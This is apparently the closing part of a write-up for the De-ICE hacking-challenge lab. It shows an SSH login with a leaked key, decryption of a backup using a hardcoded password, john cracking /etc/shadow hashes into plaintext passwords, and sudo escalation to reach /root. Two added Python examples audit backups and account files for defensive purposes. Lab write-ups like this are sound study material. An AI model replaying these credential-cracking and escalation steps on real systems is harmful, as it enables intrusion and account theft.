@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'downloadkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: downloadkey
Permission denied (publickey).
root@kali:~# chmod 600 downloadkey
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$

mbrown@webhost:~$ uname -a
Linux webhost 3.5.0-28-generic #48~precise1-Ubuntu SMP Wed Apr 24 21:43:05 UTC 2013 i686 i686 i386 GNU/Linux
mbrown@webhost:~$ pwd
/home/mbrown

mbrown@webhost:~$ su rhedley
Password:
rhedley@webhost:/home/mbrown$

... some privilege escalation processes...

rhedley@webhost:/home/mbrown$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp

TMPBACKUP="/tmp/backup";

NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip --best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}

root@kali:~# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 23:42:00 2013, max compression

root@kali:~# tar tvzf backup_webhost_130111.tar.gz
drwxr-xr-x root/root         0 2013-05-13 22:57 etc/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/ssh/
-rw-r--r-- root/root    125749 2013-01-11 23:42 etc/ssh/moduli
-rw-r--r-- root/root       302 2013-01-11 23:42 etc/ssh/ssh_import_id
-rw-r--r-- root/root      1669 2013-01-11 23:42 etc/ssh/ssh_config
-rw-r--r-- root/root      3924 2013-01-11 23:42 etc/ssh/sshd_config
-rw------- root/root      1374 2013-01-11 23:42 etc/shadow-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/
-rwxr-xr-x root/root      1020 2013-01-11 23:42 etc/security/namespace.init
-rw-r--r-- root/root      1442 2013-01-11 23:42 etc/security/namespace.conf
-rw------- root/root         0 2013-01-11 23:42 etc/security/opasswd
-rw-r--r-- root/root      3635 2013-01-11 23:42 etc/security/group.conf
-rw-r--r-- root/root      4620 2013-01-11 23:42 etc/security/access.conf
-rw-r--r-- root/root       419 2013-01-11 23:42 etc/security/sepermit.conf
-rw-r--r-- root/root      2151 2013-01-11 23:42 etc/security/limits.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/namespace.d/
-rw-r--r-- root/root      2980 2013-01-11 23:42 etc/security/pam_env.conf
-rw-r--r-- root/root      2180 2013-01-11 23:42 etc/security/time.conf
-rw-r--r-- root/root      1795 2013-01-11 23:42 etc/security/capability.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/limits.d/
-rw-r--r-- root/root       728 2013-01-11 23:42 etc/group
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/skel/
-rw-r--r-- root/root       675 2012-04-03 17:58 etc/skel/.profile
-rw-r--r-- root/root       220 2012-04-03 17:58 etc/skel/.bash_logout
-rw-r--r-- root/root      3486 2012-04-03 17:58 etc/skel/.bashrc
-rw------- root/root       881 2013-01-11 23:42 etc/group-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sudoers.d/
-r--r----- root/root       753 2013-01-11 23:42 etc/sudoers.d/README
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/grub.d/
-rwxr-xr-x root/root      6743 2013-01-11 23:42 etc/grub.d/00_header
-rwxr-xr-x root/root       214 2013-01-11 23:42 etc/grub.d/40_custom
-rwxr-xr-x root/root      5522 2013-01-11 23:42 etc/grub.d/05_debian_theme
-rwxr-xr-x root/root      7780 2013-01-11 23:42 etc/grub.d/10_linux
-rwxr-xr-x root/root      6335 2013-01-11 23:42 etc/grub.d/20_linux_xen
-rwxr-xr-x root/root        95 2013-01-11 23:42 etc/grub.d/41_custom
-rwxr-xr-x root/root      1588 2013-01-11 23:42 etc/grub.d/20_memtest86+
-rwxr-xr-x root/root      7603 2013-01-11 23:42 etc/grub.d/30_os-prober
-rw-r--r-- root/root       483 2013-01-11 23:42 etc/grub.d/README
-rwxr-xr-x root/root      1388 2013-01-11 23:42 etc/grub.d/30_uefi-firmware
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sgml/
-rw-r--r-- root/root       366 2013-01-11 23:42 etc/sgml/catalog
-rw-r--r-- root/root       391 2013-01-11 23:42 etc/sgml/xml-core.cat
-rw-r--r-- root/root       335 2013-01-11 23:42 etc/sgml/catalog.old
-rw-r--r-- root/root       743 2013-01-11 23:42 etc/fstab
-rw-r--r-- root/root      2845 2013-01-11 23:42 etc/sysctl.conf
-rw-r--r-- root/root        65 2013-01-11 23:42 etc/hosts
-rw-r--r-- root/root      3343 2013-01-11 23:42 etc/gai.conf
-rw-rw---- root/sasl     12288 2013-01-11 23:42 etc/sasldb2
-r--r----- root/root       724 2013-01-11 23:42 etc/sudoers
-rw-r--r-- root/root        19 2013-01-11 23:42 etc/su-to-rootrc
-rw-r--r-- root/root      3902 2013-01-11 23:42 etc/securetty
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/groff/
-rw-r--r-- root/root       848 2013-01-11 23:42 etc/groff/mdoc.local
-rw-r--r-- root/root       854 2013-01-11 23:42 etc/groff/man.local
-rw-r--r-- root/root     19281 2013-01-11 23:42 etc/services
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/multi-user.target.wants/
lrwxrwxrwx root/root         0 2012-12-06 23:55 etc/systemd/system/multi-user.target.wants/rsyslog.service -> /lib/systemd/system/rsyslog.service
-rw-r----- root/shadow    1056 2013-01-11 23:42 etc/shadow
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sysctl.d/
-rw-r--r-- root/root      1292 2013-01-11 23:42 etc/sysctl.d/10-ptrace.conf
-rw-r--r-- root/root       726 2013-01-11 23:42 etc/sysctl.d/10-kernel-hardening.conf
-rw-r--r-- root/root       519 2013-01-11 23:42 etc/sysctl.d/README
-rw-r--r-- root/root       490 2013-01-11 23:42 etc/sysctl.d/10-ipv6-privacy.conf
-rw-r--r-- root/root       509 2013-01-11 23:42 etc/sysctl.d/10-network-security.conf
-rw-r--r-- root/root        77 2013-01-11 23:42 etc/sysctl.d/10-console-messages.conf
-rw-r--r-- root/root       506 2013-01-11 23:42 etc/sysctl.d/10-zeropage.conf
-rw-r--r-- root/root        87 2013-01-11 23:42 etc/shells
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/%gconf-tree.xml
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/2/
-rw-r--r-- root/root      3397 2013-01-11 23:42 etc/gconf/2/evoldap.conf
-rw-r--r-- root/root      1421 2013-01-11 23:42 etc/gconf/2/path
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
-rw-r--r-- root/root      1194 2013-01-11 23:42 etc/passwd

root@kali:~# mkdir webhost
root@kali:~# mv backup_webhost_130111.tar.gz webhost/
root@kali:~# cd webhost
root@kali:~/webhost# tar xvzf backup_webhost_130111.tar.gz
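
The archive listing above shows why this backup was so useful: it carries `etc/shadow`, `etc/shadow-`, `etc/sudoers` and `etc/sasldb2` along with harmless config. Whatever modes those files have inside the tar, the only protection they get once the archive sits in a reachable directory is the mode of the `.tar.gz` itself. The following added example (my code, not part of the original write-up or the De-ICE image) builds a small archive in memory with paths modelled on the listing and flags the members a backup should never ship world-readable; the pattern list is an assumed baseline, not something the post defines.

```python
"""Flag sensitive files inside a backup archive before it is published.

Added example, not from the original write-up. The archive is constructed in
memory to mirror the paths seen in the post's listing (assumption).
"""
import io
import re
import tarfile

# Paths that should never travel in a world-readable backup.
# Assumption: a reasonable baseline, not a list taken from the post.
SENSITIVE_PATTERNS = [
    re.compile(r"(^|/)etc/shadow-?$"),
    re.compile(r"(^|/)etc/gshadow-?$"),
    re.compile(r"(^|/)etc/sudoers(\.d/.*)?$"),
    re.compile(r"(^|/)etc/ssh/ssh_host_.*_key$"),
    re.compile(r"(^|/)etc/sasldb2$"),
    re.compile(r"(^|/)\.ssh/(id_[a-z0-9]+|authorized_keys)$"),
]


def build_sample_archive() -> bytes:
    """Construct a small tar.gz resembling the backup in the post (constructed data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, mode in [
            ("etc/hosts", 0o644),
            ("etc/shadow", 0o640),
            ("etc/shadow-", 0o600),
            ("etc/sudoers", 0o440),
            ("etc/sudoers.d/README", 0o440),
            ("etc/ssh/ssh_config", 0o644),
            ("etc/sasldb2", 0o660),
        ]:
            data = b"constructed\n"
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = mode
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def find_sensitive_members(archive_bytes: bytes) -> list:
    """Return (path, mode_octal) for regular-file members matching a sensitive pattern.

    The mode is reported only to show that a restrictive inner mode (0600 on
    shadow-) gives no protection once the archive itself is readable.
    """
    hits = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            if any(p.search(member.name) for p in SENSITIVE_PATTERNS):
                hits.append((member.name, oct(member.mode & 0o777)))
    return hits


if __name__ == "__main__":
    for path, mode in find_sensitive_members(build_sample_archive()):
        print(f"{mode}  {path}")
```

Run it against a real archive by replacing `build_sample_archive()` with the file's bytes; any hit means the archive must stay out of FTP and web roots, or the members should be dropped before the backup is exported.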

root@kali:~/webhost# john etc/shadow-
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt [32/32])
rhedley          (rhedley)
mbrown           (mbrown)
mparker          (mparker)
swillard         (swillard)
guesses: 4  time: 0:00:00:00 DONE (Wed Jan  8 11:12:15 2014)  c/s: 50.00  trying: swillard

root@kali:~/webhost# cat etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:sraines
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
ssl-cert:x:114:
postdrop:x:117:
memcache:x:118:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:

root@kali:~/webhost# john etc/shadow --wordlist=/usr/share/wordlists/darkc0de.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 3 password hashes with 3 different salts (sha512crypt [32/32])
Remaining 1 password hash
brillantissimo   (sraines)
guesses: 1  time: 0:00:36:46 DONE (Wed Jan  8 12:22:24 2014)  c/s: 268  trying: brillantissimo
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$ su sraines
Unknown id: sraines
mbrown@webhost:~$ su swillard
Password:
swillard@webhost:/home/mbrown$ sudo -l
[sudo] password for swillard:
Matching Defaults entries for swillard on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User swillard may run the following commands on this host:
    (ALL : ALL) ALL

swillard@webhost:/home/mbrown$ ls /root
ls: cannot open directory /root: Permission denied
swillard@webhost:/home/mbrown$ sudo ls /root
cleanlogs.sh  secret.jpg
swillard@webhost:/home/mbrown$
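
Two things in the session above are worth a defender's attention: `su sraines` answers `Unknown id` even though sraines has a hash in `etc/shadow` and is the only member of the `sudo` group, and the earlier `john` run cracked four accounts in `etc/shadow-` with no wordlist at all, meaning their passwords equalled their usernames. The following added example (my code, not from the write-up) cross-checks constructed `passwd`, `shadow` and `group` samples modelled on what the post found and reports orphaned shadow entries, empty password fields, non-root UID 0 accounts and membership in privileged groups. It deliberately does not verify hashes; that part belongs to `john`, as the post shows.

```python
"""Cross-check passwd, shadow and group from a recovered backup.

Added example, not part of the original write-up. The three samples below are
constructed to mirror what the post found: a sudo member (sraines) that exists
in shadow and group but has no passwd entry, hence su's "Unknown id".
"""

# Constructed samples; hashes and dates are placeholders, not the real values.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
mbrown:x:1001:1001::/home/mbrown:/bin/bash
rhedley:x:1002:1002::/home/rhedley:/bin/bash
swillard:x:1003:1003::/home/swillard:/bin/bash
nopw:x:1004:1004::/home/nopw:/bin/sh
"""

SHADOW = """\
root:$6$constructedsalt$constructedhash:15716:0:99999:7:::
sraines:$6$constructedsalt$constructedhash:15716:0:99999:7:::
mbrown:$6$constructedsalt$constructedhash:15716:0:99999:7:::
rhedley:$6$constructedsalt$constructedhash:15716:0:99999:7:::
swillard:$6$constructedsalt$constructedhash:15716:0:99999:7:::
nopw::15716:0:99999:7:::
"""

GROUP = """\
root:x:0:
sudo:x:27:sraines
shadow:x:42:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:
"""

# Assumption: groups whose membership should always be reviewed.
PRIVILEGED_GROUPS = ("sudo", "admin", "wheel", "shadow")


def parse_colon_file(text):
    """Map the first field (name) to the full field list; skip blank and comment lines."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def audit_accounts(passwd_text, shadow_text, group_text):
    """Return sorted (finding, subject) pairs describing inconsistencies and risky state."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    groups = parse_colon_file(group_text)
    findings = set()

    for name, fields in shadow.items():
        if name not in passwd:
            # Credentials exist but no account definition: su reports "Unknown id",
            # yet the hash is still crackable if the file leaks.
            findings.add(("orphan_shadow", name))
        if fields[1] == "":
            findings.add(("empty_password", name))

    for name, fields in passwd.items():
        if fields[2] == "0" and name != "root":
            findings.add(("uid0", name))
        if fields[1] == "x" and name not in shadow:
            findings.add(("missing_shadow", name))

    for gname, fields in groups.items():
        members = [m for m in fields[3].split(",") if m] if len(fields) > 3 else []
        for member in members:
            if gname in PRIVILEGED_GROUPS:
                findings.add(("privileged_member", f"{gname}:{member}"))
            if member not in passwd:
                findings.add(("group_member_unknown", f"{gname}:{member}"))

    return sorted(findings)


if __name__ == "__main__":
    for kind, subject in audit_accounts(PASSWD, SHADOW, GROUP):
        print(f"{kind:22} {subject}")
```

On the sample this reports `sraines` three times (orphaned shadow entry, unknown group member, privileged member) and `nopw` once for its empty password field. Point the three parsers at the extracted `etc/` directory of a real backup and the same inconsistencies surface before an attacker needs to find them.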

That's all.

Some hints came from here: http://blog.techorganic.com/2013/12/de-ice-hacking-challenge-part-6.html
